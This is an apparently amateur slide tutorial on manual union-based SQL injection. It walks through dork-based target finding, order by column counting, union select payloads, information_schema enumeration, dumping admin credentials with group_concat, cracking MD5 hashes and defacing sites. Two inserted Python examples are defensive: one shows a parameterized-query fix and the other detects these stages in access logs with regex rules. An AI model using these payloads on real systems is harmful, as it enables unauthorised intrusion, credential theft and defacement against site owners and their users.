Union Based SQL Injection
The Basic & First Stage of Manual SQL Injection.
Finding Vulnerable Sites
• To find vulnerable sites we use Google dorks.
• index.php?id= (example of a Google dork)
• Dorks are shared along with this tutorial.
Checking Vulnerability
• To check whether a site is vulnerable, we add a single quote (') at the end of the URL and hit Enter.
• www.site.com/index.php?id=1'
If the page remains the same, it is not vulnerable; if it shows an error related to the SQL query, then it is vulnerable.
Finding Number of Columns
• To find the number of columns in the site's database we replace the quote (') with an order by n statement.
• Change n from 1, 2, 3, 4, … n until you get an error like "Unknown column".
• If you get "Unknown column" at number 6, then there are 5 columns in the site's database.
Finding Vulnerable Column
• To find the vulnerable column we put a minus sign (-) before the ID number, like index.php?id=-2
• We also replace the order by statement with union select. After union select we type all the column numbers, like
site.com/index.php?id=-2 union select 1,2,3,4,5--
• After that we will get a bold number on the page.
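The steps above only work when the id value is pasted into the SQL text, and they stop working once it is sent as a bound parameter. The following is an added example, not part of the original slides: it uses an in-memory SQLite database as a stand-in for the site's MySQL backend, and the table, column and function names are hypothetical.

```python
import sqlite3

def make_db():
    # Constructed sample data: one 5-column table, matching the page's column count.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE articles "
               "(id INTEGER, title TEXT, body TEXT, author TEXT, views INTEGER)")
    db.execute("INSERT INTO articles VALUES (1, 'Hello', 'First post', 'alice', 10)")
    return db

def fetch_vulnerable(db, raw_id):
    # The 'before': the request value becomes part of the SQL text, so anything
    # after the number (order by n, union select ...) is parsed as SQL.
    return db.execute("SELECT * FROM articles WHERE id = " + raw_id).fetchall()

def fetch_parameterized(db, raw_id):
    # The fix: the value is bound as data and never reaches the SQL parser.
    return db.execute("SELECT * FROM articles WHERE id = ?", (raw_id,)).fetchall()

def fetch_validated(db, raw_id):
    # Defence in depth: an id is a plain non-negative integer, nothing else.
    if not (raw_id.isascii() and raw_id.isdigit()):
        raise ValueError("id must be a non-negative integer")
    return fetch_parameterized(db, int(raw_id))

if __name__ == "__main__":
    db = make_db()
    payload = "-2 union select 1,2,3,4,5"   # the string from the slide above
    print("concatenated :", fetch_vulnerable(db, payload))
    print("parameterized:", fetch_parameterized(db, payload))
    print("normal lookup:", fetch_parameterized(db, "1"))
```

With the concatenated query the injected row comes back in place of a real article; with the bound parameter the same string is compared as a value, matches nothing, and a missing row is all the application ever shows.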
Finding Version, DB & user
• In the last slide we found the vulnerable column, which was shown in bold.
• To find the version, database or user we replace the vulnerable column number with one of:
• version()
• database()
• user()
If the above don't work, then use hex(@@version)
Finding Table Name
• To find table names use the following statements.
• group_concat(table_name)
from information_schema.tables where table_schema=database()--
• Put group_concat(table_name) in place of the vulnerable column number, and type the second query after the last column number, like
site.com/index.php?id=-2 union select 1,2,3,4,group_concat(table_name),6 from information_schema.tables where table_schema=database()--
Dumping Admin Table
• group_concat(column_name)
from information_schema.columns where table_name=mysqlchar()--
• Download & install HackBar in Mozilla Firefox: https://addons.mozilla.org/en-US/firefox/addon/3899
• Select sql>Mysql>MysqlChar()
• A small window will open. Type the admin table name (in my case it is tbl_admin) and click OK. Copy & paste the chars in place of mysqlchar().
Extracting Admin info
• After hitting Enter you will see the admin username, password, id, type & many more columns on the page.
• To dump the user name and password, replace group_concat(column_name) with group_concat(username,0x3a,password)
• Replace the information_schema… blah blah part with just a simple from and the admin table name, like
index.php?id=-2 union select 1,2,3,4,group_concat(username,0x3a,password),6 from tbl_admin--
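Each stage in these slides leaves a recognisable request in the web server's access log. The following is an added example, not part of the original slides: it scans combined-format log lines for those stages; the rule names, function names and sample log lines are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Rules mirror the stages on this page, in order; the rule names are this example's own.
RULES = [
    ("quote_probe",  re.compile(r"=-?\d+'(?:&|$)")),
    ("order_by_n",   re.compile(r"\border\s+by\s+\d+", re.I)),
    ("union_select", re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I)),
    ("schema_enum",  re.compile(r"\binformation_schema\.(?:tables|columns)\b", re.I)),
    ("group_concat", re.compile(r"\bgroup_concat\s*\(", re.I)),
]
# Client address and request target from a combined-format access log line.
REQUEST = re.compile(r'^(\S+) \S+ \S+ \[[^\]]*\] "[A-Z]+ (\S+) [^"]*"')

# Constructed sample log lines (documentation addresses, not real traffic).
_T = '- - [10/Oct/2024:13:55:36 +0000]'
SAMPLE_LOG = [
    f'198.51.100.23 {_T} "GET /index.php?id=1 HTTP/1.1" 200 512',
    f'203.0.113.7 {_T} "GET /index.php?id=1%27 HTTP/1.1" 500 210',
    f'203.0.113.7 {_T} "GET /index.php?id=1%20order%20by%206 HTTP/1.1" 500 210',
    f'203.0.113.7 {_T} "GET /index.php?id=-2+union+select+1,2,3,4,5-- HTTP/1.1" 200 530',
    f'203.0.113.7 {_T} "GET /index.php?id=-2%20union%20select%201,2,3,4,'
    'group_concat(table_name),6%20from%20information_schema.tables%20where%20'
    'table_schema=database()-- HTTP/1.1" 200 600',
    f'198.51.100.23 {_T} "GET /search.php?q=union+station+select+seats HTTP/1.1" 200 900',
]

def scan(lines):
    """Return {client_ip: [rule names in first-seen order]} for matching requests."""
    hits = {}
    for line in lines:
        m = REQUEST.match(line)
        if not m:
            continue
        ip, target = m.groups()
        # Decode %xx and '+' so encoded keywords match, then collapse whitespace.
        query = " ".join(unquote_plus(target.partition("?")[2]).split())
        for name, rx in RULES:
            if rx.search(query) and name not in hits.setdefault(ip, []):
                hits[ip].append(name)
    return hits

def reached_extraction(hits):
    """Clients that got past probing to UNION or schema queries: triage these first."""
    return sorted(ip for ip, names in hits.items()
                  if {"union_select", "schema_enum"} & set(names))

if __name__ == "__main__":
    print(scan(SAMPLE_LOG))
    print(reached_extraction(scan(SAMPLE_LOG)))
```

A client that moves from the quote probe through order by to information_schema within a short window is working through these slides against a live parameter, which is a stronger signal than any single match.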
Extra Guideline
• To deface the site you have to find the admin page, which will be like
site.com/admin
site.com/login.php
etc.
• Before this you have to crack the MD5-hashed password with online sites like md5online.org
• <3
• Thanks for watching. I hope you liked it. I am always available for live help on TeamViewer; please contact me about any issue.
• Facebook.com/backk.sppac3
• Facebook.com/UrduTutorialsPoint
• Stay connected <3 for more tutorials


Union based sql injection by Urdu Tutorials Point
